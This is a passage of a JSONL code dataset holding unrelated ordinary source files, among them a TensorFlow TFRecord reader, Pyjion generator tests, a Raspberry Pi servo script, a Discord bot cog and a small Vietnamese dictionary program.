sparse.to_dense(feature_tensor)\n feature_tensor = tf.squeeze(feature_tensor, axis=0)\n\n # Preprocess features\n feature_tensor = preprocess_feature(feature_tensor, feature_info, preprocessing_map)\n\n features_dict[feature_node_name] = feature_tensor\n\n labels = features_dict.pop(feature_config.get_label(key=\"name\"))\n\n if not required_fields_only:\n # Check if label is one-hot and correctly masked\n tf.debugging.assert_equal(tf.cast(tf.reduce_sum(labels), tf.float32), tf.constant(1.0))\n\n return features_dict, labels\n\n return _parse_sequence_example_fn\n\n\ndef get_parse_fn(\n tfrecord_type: str,\n feature_config: FeatureConfig,\n preprocessing_keys_to_fns: dict,\n max_sequence_size: int = 0,\n required_fields_only: bool = False,\n pad_sequence: bool = True,\n):\n # Define preprocessing functions\n preprocessing_map = PreprocessingMap()\n preprocessing_map.add_fns(preprocessing_keys_to_fns)\n\n # Generate parsing function\n if tfrecord_type == TFRecordTypeKey.EXAMPLE:\n parse_fn = make_example_parse_fn(\n feature_config=feature_config,\n preprocessing_map=preprocessing_map,\n required_fields_only=required_fields_only,\n )\n elif tfrecord_type == TFRecordTypeKey.SEQUENCE_EXAMPLE:\n parse_fn = make_sequence_example_parse_fn(\n feature_config=feature_config,\n preprocessing_map=preprocessing_map,\n max_sequence_size=max_sequence_size,\n required_fields_only=required_fields_only,\n pad_sequence=pad_sequence,\n )\n else:\n raise KeyError(\"Invalid TFRecord type specified: {}\".format(tfrecord_type))\n\n return parse_fn\n\n\ndef read(\n data_dir: str,\n feature_config: FeatureConfig,\n tfrecord_type: str,\n file_io: FileIO,\n max_sequence_size: int = 0,\n batch_size: int = 0,\n preprocessing_keys_to_fns: dict = {},\n parse_tfrecord: bool = True,\n use_part_files: bool = False,\n logger: Logger = None,\n **kwargs\n) -> data.TFRecordDataset:\n \"\"\"\n - reads tfrecord data from an input directory\n - selects relevant features\n - creates X and y data\n\n Args:\n data_dir: Path to directory containing csv files to read\n feature_config: ml4ir.config.features.Features 
object extracted from the feature config\n tfrecord_type: either example or sequence_example\n batch_size: int value specifying the size of the batch\n preprocessing_keys_to_fns: dictionary mapping preprocessing keys in the feature_config to functions\n parse_tfrecord: whether to parse SequenceExamples into features\n logger: logging object\n\n Returns:\n tensorflow dataset\n \"\"\"\n parse_fn = get_parse_fn(\n feature_config=feature_config,\n tfrecord_type=tfrecord_type,\n preprocessing_keys_to_fns=preprocessing_keys_to_fns,\n max_sequence_size=max_sequence_size,\n )\n\n # Get all tfrecord files in directory\n tfrecord_files = file_io.get_files_in_directory(\n data_dir,\n extension=\"\" if use_part_files else \".tfrecord\",\n prefix=\"part-\" if use_part_files else \"\",\n )\n\n # Parse the protobuf data to create a TFRecordDataset\n dataset = data.TFRecordDataset(tfrecord_files)\n if parse_tfrecord:\n dataset = dataset.map(parse_fn).apply(data.experimental.ignore_errors())\n\n # Create BatchedDataSet\n if batch_size:\n dataset = dataset.batch(batch_size, drop_remainder=True)\n\n if logger:\n logger.info(\n \"Created TFRecordDataset from SequenceExample protobufs from {} files : {}\".format(\n len(tfrecord_files), str(tfrecord_files)[:50]\n )\n )\n\n return dataset\n","sub_path":"python/ml4ir/base/data/tfrecord_reader.py","file_name":"tfrecord_reader.py","file_ext":"py","file_size_in_byte":13807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"459629407","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport pandas as pd\n\n# from sklearn import svm\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n# import create_data\nfrom mpl_toolkits import mplot3d\n\nsns.set(font_scale=1)\n\n\nrecipies = pd.read_csv('data.csv')\n\nfig = plt.figure()\nax = plt.axes(projection='3d')\n\n# Data for a three-dimensional line\nzline = np.linspace(0, 15, 1000)\nxline = np.sin(zline)\nyline = np.cos(zline)\nax.plot3D(xline, yline, zline, 'gray')\n\n# Data for three-dimensional scattered points\nzdata = 15 * np.random.random(100)\nxdata = np.sin(zdata) + 0.1 * np.random.randn(100)\nydata = np.cos(zdata) + 0.1 * np.random.randn(100)\nax.scatter3D(xdata, ydata, zdata, c=zdata, cmap='Greens')\n\n\nplt.show()\n","sub_path":"SVM/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"316374829","text":"from osv import fields, osv\n\nclass sale_order(osv.osv):\n _inherit = 'sale.order'\n\n def manual_invoice(self, cr, uid, ids, context=None):\n if context:\n partner=context.get('partner_id') \n res = super(sale_order, self).manual_invoice(cr, uid, ids,context)\n inv_obj=self.pool.get('account.invoice')\n for invoice in inv_obj.browse(cr,uid,[res['res_id']]):\n invoice_address=invoice.partner_id.street \n invoice_phone=invoice.partner_id.phone or invoice.partner_id.mobile\n inv_obj.write(cr,uid,res['res_id'],{'invoice_address':invoice_address,'invoice_phone':invoice_phone})\n return res\nsale_order()","sub_path":"ecua_invoice/objects/sale.py","file_name":"sale.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"546541095","text":"# 2020.12.24(목)\n# 최대값 찾기\n\ninput_array = [3, 5, 6, 1, 2, 4]\n\n\n# 1.내가 짠 코드\ndef find_max_num(array):\n max_value = max(array)\n return max_value\n\n\n# 2.비효율적인 코드\n# 각 숫자마다 모든 다른 숫자와 비교해서 최대값 
찾기\ndef find_max_num2(array):\n for num in array:\n for compare_num in array:\n if num < compare_num:\n break\n else:\n return num\n\n\nresult = find_max_num(input_array)\nprint(result)\n","sub_path":"Study/My_cource/week_1/01_01_find_max_num.py","file_name":"01_01_find_max_num.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"20624671","text":"class Solution:\n def combinationSum(self, candidates, target):\n \"\"\"\n :type candidates: List[int]\n :type target: int\n :rtype: List[List[int]]\n \"\"\"\n candidates.sort()\n self.anslist = []\n self.DFS(candidates, target, 0, [])\n return self.anslist\n\n def DFS(self, cand, tar, start, value_list):\n if tar == 0:\n return self.anslist.append(value_list)\n for i in range(start, len(cand)):\n if cand[i] > tar:\n return\n self.DFS(cand, tar - cand[i], i, value_list+[cand[i]])\n","sub_path":"src/python/combination-sum-39.py","file_name":"combination-sum-39.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"56358271","text":"from io import StringIO\nimport pyjion\n\n\ndef test_single_yield():\n def gen():\n x = 1\n yield x\n\n g = gen()\n assert next(g) == 1\n assert not pyjion.info(gen).failed\n\n\ndef test_double_yield():\n def gen():\n x = 1\n yield x\n yield 2\n\n g = gen()\n assert next(g) == 1\n assert next(g) == 2\n assert not pyjion.info(gen).failed\n\n\ndef test_conditional_yield():\n def gen():\n x = 1\n if x == 1:\n yield x\n else:\n yield 2\n\n g = gen()\n assert next(g) == 1\n assert not pyjion.info(gen).failed\n\n\ndef test_yields_from_iterator():\n def gen():\n yield 1\n yield 2\n yield 3\n\n g = gen()\n result = list(g)\n assert result == [1, 2, 3]\n assert not pyjion.info(gen).failed\n\n\ndef test_yields_from_range_gen():\n def gen():\n for n in range(10):\n yield f'{n}!'\n\n result = []\n for x in gen():\n result.append(x)\n assert result == ['0!', '1!', '2!', '3!', '4!', '5!', '6!', '7!', '8!', '9!']\n assert not pyjion.info(gen).failed\n\n\ndef test_yields_from_range_gen_listcomp():\n def gen():\n for n in range(10):\n yield f'{n}!'\n\n result = [x for x in gen()]\n assert result == ['0!', '1!', '2!', '3!', '4!', '5!', '6!', '7!', '8!', '9!']\n assert not pyjion.info(gen).failed\n\n\ndef test_nested_generator():\n def evens(i):\n for n in range(10):\n if n % 2:\n yield n\n\n def tens():\n for n in evens(range(100)):\n if n % 10:\n yield f'{n}!'\n\n assert [x for x in tens()] == ['1!', '3!', '5!', '7!', '9!']\n assert not pyjion.info(tens).failed\n assert not pyjion.info(evens).failed\n\n\ndef test_preservation_of_boxed_variables():\n def cr():\n x = '1'\n yield x\n x = '2'\n yield x\n x = '3'\n yield x\n gen = cr()\n assert (next(gen), next(gen), next(gen)) == ('1', '2', '3')\n assert not pyjion.info(cr).failed\n\n\ndef test_preservation_of_unboxed_variables():\n def cr():\n x = 1\n yield x\n x = 2\n yield x\n x = 3\n yield x\n gen = cr()\n assert (next(gen), next(gen), next(gen)) == (1, 2, 3)\n assert not pyjion.info(cr).failed\n\n\ndef test_range_generator():\n def cr():\n for n in range(10):\n yield f'{n}!'\n assert [x for x in cr()] == ['0!', '1!', '2!', '3!', '4!', '5!', '6!', '7!', '8!', '9!']\n assert not pyjion.info(cr).failed\n\n\ndef test_yield_within_branches():\n def cr():\n x = '2'\n if x == '2':\n yield 'a'\n else:\n yield 'b'\n yield 'c'\n x = x + '2'\n if x == '22':\n yield 'd'\n else:\n yield x\n yield 'c'\n gen = 
cr()\n assert (next(gen), next(gen), next(gen)) == ('a', 'c', 'd')\n assert not pyjion.info(cr).failed\n\n\ndef test_yield_within_branches_for_boxable_vars():\n def cr():\n x = 2\n if x == 2:\n yield 'a'\n else:\n yield 'b'\n yield 'c'\n x = x + 2\n if x == 4:\n yield 'd'\n else:\n yield x\n yield 'c'\n gen = cr()\n assert tuple(gen) == ('a', 'c', 'd', 'c')\n assert not pyjion.info(cr).failed\n\n\ndef test_yield_within_branches_for_boxable_vars_as_iter():\n def cr():\n x = 2\n if x == 2:\n yield 'a'\n else:\n yield 'b'\n yield 'c'\n x = x + 2\n if x == 4:\n yield 'd'\n else:\n yield x\n yield 'c'\n assert [x for x in cr()] == ['a', 'c', 'd', 'c']\n assert not pyjion.info(cr).failed\n\n\ndef test_nested_generator_calling_uncompiled_function():\n def cr1():\n with StringIO(\"hello\") as s:\n for letter in s:\n yield letter\n\n def cr2():\n for n in \"!@#%$^\":\n for i in cr1():\n yield n + i\n\n gen = cr2()\n\n assert list(gen) == ['!hello', '@hello', '#hello', '%hello', '$hello', '^hello']\n assert pyjion.info(cr1).failed\n assert not pyjion.info(cr2).failed\n","sub_path":"Tests/test_generators.py","file_name":"test_generators.py","file_ext":"py","file_size_in_byte":4105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"335039887","text":"import RPi.GPIO as GPIO\r\nimport time\r\nimport lirc\r\n\r\nGPIO.setmode(GPIO.BOARD)\r\nGPIO.setup(40,GPIO.OUT)\r\n\r\np = GPIO.PWM(40,100)\r\n\r\np.start(15)\r\n\r\nir_id = lirc.init(\"ir_servo\", blocking = False)\r\n\r\ntry:\r\n while True:\r\n code_ir = lirc.nextcode()\r\n if code_ir[0] == \"pos_0\":\r\n p.ChangeDutyCycle(6.5)\r\n elif code_ir[0] == \"pos_1\":\r\n p.ChangeDutyCycle(15)\r\n elif code_ir[0] == \"pos_2\":\r\n p.ChangeDutyCycle(23.25)\r\nexcept KeyboardInterrupt:\r\n pass\r\n\r\nGPIO.cleanup()\r\n \r\n","sub_path":"Raspberry Pi Expo/ir_servo.py","file_name":"ir_servo.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"206331298","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\nimport socket\nimport selectors\nimport time\n\nsel = selectors.DefaultSelector()\ntag = 10\n\nclass Future(object):\n def __init__(self):\n self.result = None\n self._callbacks = []\n\n def add_done_callback(self, fn):\n self._callbacks.append(fn)\n\n def set_result(self, result):\n self.result = result\n for fn in self._callbacks:\n fn(self)\n\n def __iter__(self):\n yield self\n return self.result\n\ndef to_connect(sock, addr):\n sock.setblocking(False)\n try:\n sock.connect(addr)\n except BlockingIOError:\n pass\n\n f = Future()\n def on_connected():\n f.set_result(None)\n\n sel.register(sock, selectors.EVENT_WRITE, on_connected)\n yield from f\n sel.unregister(sock)\n\ndef read(sock):\n f = Future()\n\n def readable():\n f.set_result(sock.recv(2048))\n\n sel.register(sock, selectors.EVENT_READ, readable)\n slice_res = yield from f\n sel.unregister(sock)\n return slice_res\n\ndef read_all(sock):\n reponse = b''\n slice_res = yield from read(sock)\n while slice_res:\n reponse += slice_res\n slice_res = yield from read(sock)\n return reponse\n\n\nclass Callbaidu(object):\n def __init__(self):\n self.res = b''\n\n def accept(self):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n yield from to_connect(sock, ('115.239.211.112', 80))\n requests = 'GET / HTTP/1.1\\r\\n Host:www.baidu.com\\r\\nConnection: close\\r\\n\\r\\n'.encode('utf-8')\n sock.send(requests)\n self.res = yield from 
read_all(sock)\n print(len(self.res))\n\n global tag\n tag -= 1\n\n\n\nclass Task(object):\n def __init__(self, conn):\n self.conn = conn\n f = Future()\n self.step(f)\n\n def step(self, future):\n try:\n # send resumes the coroutine in conn (i.e. accept) and runs it until the next yield\n # next_future is the object returned by that yield\n # on the first step, future.result is None\n next_future = self.conn.send(future.result)\n except StopIteration:\n return\n next_future.add_done_callback(self.step)\n\n\nif __name__ == '__main__':\n start_time = time.time()\n for i in range(tag):\n call = Callbaidu()\n Task(call.accept())\n\n while tag:\n # block until at least one event occurs\n events = sel.select()\n for key, mask in events:\n callback = key.data\n callback()\n\n end_time = time.time()\n print('yield from calls took %s seconds' % (end_time - start_time))","sub_path":"async_sync/select_way_yield_from.py","file_name":"select_way_yield_from.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"13280513","text":"from discord.ext import commands\nimport simplify as s\nimport descriptions as desc\nimport aiohttp\nfrom datetime import datetime\nfrom pytz import timezone\nimport tokens as t\nimport calendar\n\n\nclass General:\n def __init__(self, bot):\n \"\"\"\n Edit self.dates with releases we want to track\n \"\"\"\n self.bot = bot\n\n # Dates have to be in relation to UTC (so if release is 5am BST, it would be 4am UTC)\n self.dates = {\n \"Overwatch\": datetime(2016, 5, 23, 23, 0, 0), # launches 12:00am bst, -1 because its in UTC time\n \"Total War: Warhammer\": datetime(2016, 5, 24, 7, 0, 0),\n \"Hearts of Iron 4\": datetime(2016, 6, 6, 0, 0, 0),\n \"No Man's Sky\": datetime(2016, 6, 21, 0, 0, 0),\n \"Deus Ex: Mankind Divided\": datetime(2016, 8, 23, 0, 0, 0),\n \"Battlefield 1\": datetime(2016, 10, 21, 0, 0, 0),\n \"Civilization 6\": datetime(2016, 10, 21, 0, 0, 0),\n \"Dishonored 2\": datetime(2016, 11, 11, 0, 0, 0),\n }\n\n @commands.command(description=desc.reddit, brief=desc.reddit)\n async def reddit(self): # returns link to sub-reddit\n await s.destructmsg(\"https://www.reddit.com/r/idiotechgaming/\", 20, self.bot)\n\n @commands.command(description=desc.github, brief=desc.github)\n async def github(self): # returns link to github for this bot\n await s.destructmsg(\"You can request features, contribute and report issues with the bot here:\"\n \"\\nhttps://github.com/iScrE4m/IdiotechDiscordBot\", 20, self.bot)\n\n @commands.command(description=desc.twitch, brief=desc.twitchb)\n async def twitch(self):\n # finds status of Idiotech's twitch stream\n # if live, it will return amount of viewers, current stream up-time and game being played\n with aiohttp.ClientSession() as session:\n async with session.get('https://api.twitch.tv/kraken/streams?channel=idiotechgaming')as resp:\n data = await resp.json()\n if len(data[\"streams\"]) > 0:\n game = data[\"streams\"][0][\"game\"]\n views = data[\"streams\"][0][\"viewers\"]\n\n fmt = \"%Y-%m-%dT%H:%M:%SZ\"\n hrs, mins, secs = calc_duration(datetime.strptime(data[\"streams\"][0][\"created_at\"], fmt))\n\n # if one person is watching return 'person' instead of people\n if views == 1:\n peep = \"person\"\n else:\n peep = \"people\"\n\n reply = \"**Idiotech** is live streaming **{}** with **{}** {} watching! 
\" \\\n \"\\nCurrent Uptime: {} hours, {} minutes and {} seconds.\" \\\n \"\\nhttps://www.twitch.tv/idiotechgaming\".format(game, views, peep, hrs, mins, secs)\n else:\n reply = \"https://www.twitch.tv/idiotechgaming (OFFLINE)\"\n await s.destructmsg(reply, 20, self.bot)\n\n @commands.command(description=desc.twitter, brief=desc.twitter)\n async def twitter(self): # returns link to Idiotech's twitter\n await s.destructmsg('https://twitter.com/idiotechgaming', 20, self.bot)\n\n @commands.command(description=desc.fb, brief=desc.fb)\n async def facebook(self): # finds latest facebbok post and returns it, along with link to page\n with aiohttp.ClientSession() as session:\n async with session.get('https://graph.facebook.com/v2.6/idiotechgaming/posts'\n '?access_token={}'.format(t.fb_key)) as resp:\n data = await resp.json()\n\n msg1 = data[\"data\"][0][\"message\"]\n y, m, d, = date_split(data[\"data\"][0][\"created_time\"]) # y = year, m = month, d = day\n\n msg = \"**Latest Facebook Post**\\n\" \\\n \"**Posted:** {}{} of {}, {}.\\n\\n\" \\\n \"```{}```\" \\\n \"https://www.facebook.com/idiotechgaming/\" \\\n \"\".format(d, get_date_suf(d), calendar.month_name[int(m)], y, msg1)\n\n await s.destructmsg(msg, 30, self.bot)\n\n @commands.command(description=desc.youtube, brief=desc.youtube)\n async def youtube(self):\n # finds information on latest upload from Idiotech's youtube channel\n #\n\n connector = aiohttp.TCPConnector(verify_ssl=False)\n\n with aiohttp.ClientSession(connector=connector) as session:\n async with session.get('https://www.googleapis.com/youtube/v3/search?part=snippet&channelId=UC0YagOInbZx'\n 'j10gaWwb1Nag&maxResults=1&order=date&key={}'.format(t.yt_key)) as resp:\n data = await resp.json()\n # channel = \"https://www.youtube.com/c/idiotechgaming\"\n\n mo = \"**\" # Modifier (e.g. * for italic, ** for bold, __ for underline and so on)\n title = mo + \"Latest Upload: \" + mo\\\n + data[\"items\"][0][\"snippet\"][\"title\"] # [::-1] # msg + vid title, [::-1] reverses str\n\n uploaded = data[\"items\"][0][\"snippet\"][\"publishedAt\"] # datetime video was uploaded\n date = str(uploaded).split('T')[0] # just the date of upload\n\n year, month, day = date.split('-')\n month = calendar.month_name[int(month)] # takes month number and returns word form (i.e. 
05 = may)\n\n uploaded = mo + \"Uploaded: \" + mo + \"{} the {}{}, {}.\".format(month, day, get_date_suf(day), year)\n link = \"https://youtu.be/\" + data[\"items\"][0][\"id\"][\"videoId\"]\n # uses ``` to stop video from being embed\n\n await s.destructmsg(title + \"\\n\" + uploaded + \"\\n\\n\"+link, 30, self.bot)\n\n @commands.command(description=desc.rules, brief=desc.rules)\n async def rules(self):\n await self.bot.say('Please read <#179965419728273408>')\n\n @commands.group(pass_context=True, description=desc.time, brief=desc.time)\n async def time(self, ctx):\n # Group for !time command, set subcommands by wrapping them in @time.command(name='subcommand_name)\n # We use function get_time() to get all the times over the world.\n # To add a city, edit get_time() and add it into dictionary\n\n if ctx.invoked_subcommand is None:\n time = get_time()\n await s.destructmsg(\"**San Francisco**: {} | **New York**: {} | **London**: {} | **Sydney** {}\".format(\n time[\"sf\"], time[\"ny\"], time[\"london\"], time[\"sydney\"]), 30, self.bot)\n\n @time.command(name='advanced', description=desc.time_advanced, brief=desc.time_advanced)\n async def _advanced(self):\n time = get_time()\n await s.destructmsg(\n \"**San Francisco** {} (UTC-7) \"\n \"| **New York**: {} (UTC-4) \"\n \"| **London**: {} (UTC+1) \"\n \"| **Sydney**: {} (UTC+10) \"\n \"\".format(time[\"sf\"], time[\"ny\"], time[\"london\"], time[\"sydney\"]), 30, self.bot)\n\n @time.command(name='sydney', description=desc.time_sydney, brief=desc.time_sydney)\n async def _sydney(self):\n time = get_time()\n await s.destructmsg(\"**Sydney**: {} (UTC+10)\".format(time[\"sydney\"]), 30, self.bot)\n\n @time.command(name='london', description=desc.time_london, brief=desc.time_london)\n async def _london(self):\n time = get_time()\n await s.destructmsg(\"**London**: {} (UTC+1)\".format(time[\"london\"]), 30, self.bot)\n\n @time.command(name='ny', description=desc.time_ny, brief=desc.time_ny)\n async def _ny(self):\n time = get_time()\n await s.destructmsg(\"**New York**: {} (UTC-4)\".format(time[\"ny\"]), 30, self.bot)\n\n @time.command(name='sf', description=desc.time_sf, brief=desc.time_sf)\n async def _sf(self):\n time = get_time()\n await s.destructmsg(\"**San Francisco**: {} (UTC-7)\".format(time[\"sf\"]), 30, self.bot)\n\n @time.command(name='perth', description=desc.time_perth, brief=desc.time_perth)\n async def _perth(self):\n time = get_time()\n await s.destructmsg(\"**Perth**: {} (UTC+8)\".format(time[\"perth\"]), 30, self.bot)\n\n @commands.command(description=desc.steam_status, brief=desc.steam_status)\n async def steam(self):\n steam_api = 'http://is.steam.rip/api/v1/?request=SteamStatus'\n with aiohttp.ClientSession() as session:\n async with session.get(steam_api)as resp:\n data = await resp.json()\n if str(data[\"result\"][\"success\"]) == \"True\":\n login = (data[\"result\"][\"SteamStatus\"][\"services\"][\"SessionsLogon\"]).capitalize()\n community = (data[\"result\"][\"SteamStatus\"][\"services\"][\"SteamCommunity\"]).capitalize()\n economy = (data[\"result\"][\"SteamStatus\"][\"services\"][\"IEconItems\"]).capitalize()\n # leaderboards = (data[\"result\"][\"SteamStatus\"][\"services\"][\"LeaderBoards\"]).capitalize()\n\n reply = \"\"\"__**Steam Status**__\n\n **Login servers:** {}\n **Community servers:** {}\n **Economy servers:** {}\"\"\".format(login, community, economy)\n\n else:\n reply = \"Failed connecting to API - Error: {}\".format(data[\"result\"][\"error\"])\n\n await s.destructmsg(reply, 30, self.bot)\n\n 
@commands.command(pass_context=True, description=desc.release_dates, brief=desc.release_datesb)\n async def release(self, ctx):\n # We are using manual argument detection instead of @commands.group,\n # because we want subcommands to be dynamic based on our self.dates dictionary\n\n arg = \" \".join(ctx.message.content.split()[1:])\n if len(arg) > 0:\n for game in self.dates:\n if game.lower().startswith(arg.lower()) or game.lower() is arg.lower():\n\n days, hrs, mins = calc_until(self.dates[game])\n\n if int_day(days) < 0: # if hours is a minus (i.e. game is released)\n msg = \"{} is out now!\".format(game)\n elif int_day(days) == 0 and int(hrs) == 0 and int(mins) == 0:\n msg = \"{} releases within the next 60 seconds, HYPE!!!\".format(game)\n else:\n msg = \"{} releases in {}, {} hours and {} minutes.\".format(game, days, hrs, mins)\n await s.destructmsg(msg, 30, self.bot)\n\n break\n else:\n await s.destructmsg(\"No game in our release list found, that starts with {}\".format(arg), 30, self.bot)\n else:\n msg = \"Release Dates List - Times, Dates and Games are subject to change\\n\"\n\n for game, time in sorted(self.dates.items(), key=lambda x: x[1]):\n days, hrs, mins = calc_until(self.dates[game])\n\n if int_day(days) < 0: # if hours is a minus (i.e. game is released)\n msg += \"\\n{} is out now!\".format(game)\n elif int_day(days) == 0 and int(hrs) == 0 and int(mins) == 0:\n msg += \"\\n{} releases within the next 60 seconds, HYPE!!!\".format(game)\n else:\n msg += \"\\n{} releases in {}, {} hours and {} minutes.\".format(game, days, hrs, mins)\n\n # msg += \"\\n{} releases in {}, {} hours and {} minutes.\".format(game, days, hrs, mins)\n\n await s.destructmsg(\"```{}```\".format(msg), 30, self.bot)\n\n\ndef int_day(day):\n \"\"\"\n Takes day as string ('3 days') and returns just the number as an integer\n :param day:\n :return:\n \"\"\"\n day, word = day.split(\" \")\n return int(day)\n\n\ndef get_date_suf(day):\n # Get the suffix to add to date ('st' for 1, 'nd' for 2 and so on) code from http://stackoverflow.com/a/5891598\n if 4 <= int(day) <= 20 or 24 <= int(day) <= 30:\n suffix = \"th\"\n else:\n suffix = [\"st\", \"nd\", \"rd\"][int(day) % 10 - 1]\n return suffix\n\n\ndef date_split(date):\n \"\"\"\n Returns the given datetime as three strings: year, month and day\n\n :param date: The datetime to split into year, month and day\n :return: year, month, day\n \"\"\"\n\n to_split = str(date).split('T')[0]\n year, month, day = to_split.split('-')\n\n return year, month, day\n\n\ndef date_now():\n \"\"\"\n Returns the date now as three strings: year, month and day\n\n :return: year, month, day\n \"\"\"\n\n now = datetime.utcnow()\n date, time = str(now).split(' ')\n year, month, day = date.split('-')\n\n return year, month, day\n\n\ndef calc_until(rd):\n \"\"\"\n Calculates the amount of time between now and 'rd'\n\n :param rd: release date as datetime()\n :return: three strings with time left\n \"\"\"\n\n tdelta = rd - datetime.utcnow()\n tstr = str(tdelta)\n\n test_var = tstr.split(\".\")[0]\n if len(test_var) == 7 or len(test_var) == 8: # is there is still hours in the time left\n days = \"0 days\"\n hrs, mins, secs = test_var.split(\":\")\n elif len(test_var) == 5 or len(test_var) == 4: # if there is still minutes in the time left\n days = \"0 days\"\n hrs = \"0\"\n mins, secs = test_var.split(\":\")\n elif len(test_var) == 1 or len(test_var) == 2: # if there are still seconds remaining until launch\n days = \"0 days\"\n hrs = \"0\"\n mins = \"0\"\n else:\n days, notdays = 
tstr.split(\",\")\n hrs, mins, secs = notdays.split(\":\")\n\n hrs = hrs.strip() # removes spaces in string\n\n return days, hrs, mins\n\n\ndef calc_duration(start):\n \"\"\"\n Calculates the amount of time between 'start' and now\n\n :param start: Datetime\n :return: three strings with time passed\n \"\"\"\n\n tdelta = datetime.utcnow() - start\n tstr = str(tdelta)\n\n hrs, mins, secs = tstr.split(\":\")\n secs = secs.split(\".\")[0]\n\n return hrs, mins, secs\n\n\ndef get_time() -> dict:\n \"\"\"\n Function to get local time in cities\n\n :return: Dictionary with {\"city\":\"%H:%M\"}\n \"\"\"\n fmt = '%H:%M'\n\n now_utc = datetime.now(timezone('UTC'))\n\n now_pacific = now_utc.astimezone(timezone('US/Pacific'))\n sf = now_pacific.strftime(fmt)\n\n now_london = now_utc.astimezone(timezone('Europe/London'))\n london = now_london.strftime(fmt)\n\n now_sydney = now_utc.astimezone(timezone('Australia/Sydney'))\n sydney = now_sydney.strftime(fmt)\n\n now_perth = now_utc.astimezone(timezone('Australia/Perth'))\n perth = now_perth.strftime(fmt)\n\n now_ny = now_utc.astimezone(timezone('US/Eastern'))\n ny = now_ny.strftime(fmt)\n\n return {\n \"sydney\": sydney,\n \"london\": london,\n \"ny\": ny,\n \"sf\": sf,\n \"perth\": perth\n }\n\n\ndef setup(bot):\n bot.add_cog(General(bot))\n","sub_path":"cogs/general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":14653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"30485356","text":"from Parents import Button\nfrom helper.helper import kill, cleanupkill\n\n\nclass CancelButton(Button):\n\tdef __init__(self, parent):\n\t\tsuper(CancelButton, self).__init__(parent)\n\n\t\tself.default_x = 600\n\t\tself.default_y = 330\n\t\tself.default_size = 3.5\n\n\t\tself.img_idle = \"res/CancelButton.png\"\n\t\tself.img_hover = \"res/CancelButton_hover.png\"\n\t\tself.img_click = \"res/CancelButton_click.png\"\n\t\tself.proc = None\n\t\tself.parent = parent\n\t\tsuper().setup()\n\n\t\tself.hide()\n\n\tdef mouseclicked(self):\n\t\tif self.main_window.startbutton.proc is not None and self.main_window.startbutton.proc.poll() is None:\n\t\t\tkill(self.main_window.startbutton.proc.pid)\n\t\t\tcleanupkill()\n\t\twith open(\"progress.txt\", \"w\") as file:\n\t\t\tfile.write(\".\")\n","sub_path":"HomeComponents/Buttons/CancelButton.py","file_name":"CancelButton.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"616135416","text":"# hello mọi người hôm nay mình sẽ làm từ điển đơn giản bằng python\n# mình xin phép đặt tên tiếng việt\n# quên rồi phải lên google\ncactukhoa = {\n\t'home': 'ngoi nha',\n\t'baby': 'em be',\n\t'game': 'tro choi',\n\t'programmer': 'lap trinh vien',\n\t'programme': 'chuong trinh',\n\t'chicken': 'thit ga',\n\t'English': 'Tieng Anh',\n\t'Vietnam': 'Viet Nam',\n\t'ThaiLand': 'Thai lan'\n}\nhoatdong = True # biến cho biến chương trình có đang hoạt động\n# hàm trang chu\ndef Hienthitrangchu():\n\tprint('------------------------------------------')\n\tprint('Hello moi nguoi da den voi tu dien cua toi') # thới quen của mình khi lập trình js\n\tprint('------------------------------------------')\n\tprint('0. thoat chuong trinh') # thay doi mot chut\n\tprint('1. tim tu')\n\tprint('2. 
xem tat ca tu')\n# this rough version is good enough\ndef find():\n\tprint('Hay nhap tu nghia tieng anh')\n\ttukhoa = input('Tu khoa la: ')\n\tif tukhoa in cactukhoa:\n\t\tprint('Tu khoa tieng viet la %s' % (cactukhoa[tukhoa]))\n\telse:\n\t\tprint('Khong tim thay tu %s' % (tukhoa))\ndef show():\n\tprint('Day la danh sach cac tu khoa hien co trong tu dien nay')\n\tfor tukhoa, nghia in cactukhoa.items():\n\t\tprint('%s : %s' % (tukhoa, nghia)) # ok\nwhile hoatdong:\n\tHienthitrangchu()\n\ttukhoa = int(input('Ban muon lam gi: '))\n\tif tukhoa == 0:\n\t\thoatdong = False\n\telif tukhoa == 1:\n\t\tfind();\n\telif tukhoa == 2:\n\t\tshow();\nprint('Hen gap lai ^-^')\n# you have to press Shift and right-click\n# ok\n# ok done, remember to like and subscribe for me\n","sub_path":"quay/tudienpython/tudien.py","file_name":"tudien.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
